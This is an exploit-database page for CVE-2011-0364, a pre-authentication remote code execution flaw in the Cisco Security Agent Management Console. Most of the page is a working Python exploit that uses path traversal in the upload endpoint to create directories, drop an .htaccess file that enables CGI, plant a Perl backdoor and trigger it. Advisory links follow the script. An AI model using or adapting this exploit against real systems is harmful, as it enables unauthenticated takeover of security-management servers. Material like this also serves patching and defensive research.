Cisco Security Agent Web Management Interface Bug Lets Remote Users Execute Arbitrary Code

2011.04.14
Risk: High
Local: No
Remote: Yes
CWE: CWE-noinfo


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

#!/usr/bin/env python # Exploits Cisco Security Agent Management Console &#65533;&#65533;st_upload&#65533;&#65533; (CVE-2011-0364) # gerry eisenhaur <gerry.eisenhaur@gmail.com> import httplib import mimetools import StringIO _boundary = mimetools.choose_boundary() _host_uid = 'C087EFAE-05A2-4A0B-9512-E05E5ED84AEB' _csamc = "192.168.0.108" # we need to enable some scripting to get command access htaccess = "Options +Includes +ExecCGI\r\nAddHandler cgi-script gee" perl_path = "#!c:/program files/cisco/csamc/csamc60/perl/5.8.7/bin/mswin32-x86/perl\r\n", backdoor = "exec \"calc.exe\";" def send_request(params=None): buf = StringIO.StringIO() headers = {"Content-type": 'multipart/form-data; boundary=%s' % _boundary} for(key, value) in params.iteritems(): buf.write('--%s\r\n' % _boundary) buf.write('Content-Disposition: form-data; name="%s"' % key) buf.write('\r\n\r\n%s\r\n' % value) buf.write('--' + _boundary + '--\r\n\r\n') body = buf.getvalue() conn = httplib.HTTPSConnection(_csamc) conn.request("POST", "/csamc60/agent", body, headers) response = conn.getresponse() print response.status, response.reason conn.close() def main(): ### Build up required dir tree dirtree = ["../bin/webserver/htdocs/diag/bin", "../bin/webserver/htdocs/diag/bin/webserver", "../bin/webserver/htdocs/diag/bin/webserver/htdocs"] _params = { 'host_uid': _host_uid, 'jobname': None, 'host': "aa", 'diags': " ", 'diagsu': " ", 'profiler': " ", 'extension': "gee", } for path in dirtree: print "[+] Creating directory: %s" % path _params['jobname'] = path send_request(_params) ### Done building path, drop files print "[+] Dropping .htaccess" send_request({ 'host_uid': _host_uid, 'jobname': '', 'host': "/../bin/webserver/", 'diags': "", 'diagsu': "", 'profiler': htaccess, 'extension': "/../.htaccess", }) print "[+] Dropping payload" send_request({ 'host_uid': _host_uid, 'jobname': '', 'host': "/../bin/webserver/htdocs/gerry", 'diags': perl_path, 'diagsu': "", 'profiler': backdoor, 'extension': "/../exploit.gee", }) print "[+] Done, Executing dropped file." try: conn = httplib.HTTPSConnection(_csamc, timeout=1) conn.request("GET", "/csamc60/exploit.gee") response = conn.getresponse() print response.status, response.reason print response.read() except httplib.ssl.SSLError: pass print "[+] Finished." if __name__ == '__main__': main()

References:

http://xforce.iss.net/xforce/xfdb/65436
http://www.zerodayinitiative.com/advisories/ZDI-11-088
http://www.vupen.com/english/advisories/2011/0424
http://www.securitytracker.com/id?1025088
http://www.securityfocus.com/bid/46420
http://www.securityfocus.com/archive/1/archive/1/516505/100/0/threaded
http://secunia.com/advisories/43393
http://secunia.com/advisories/43383


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top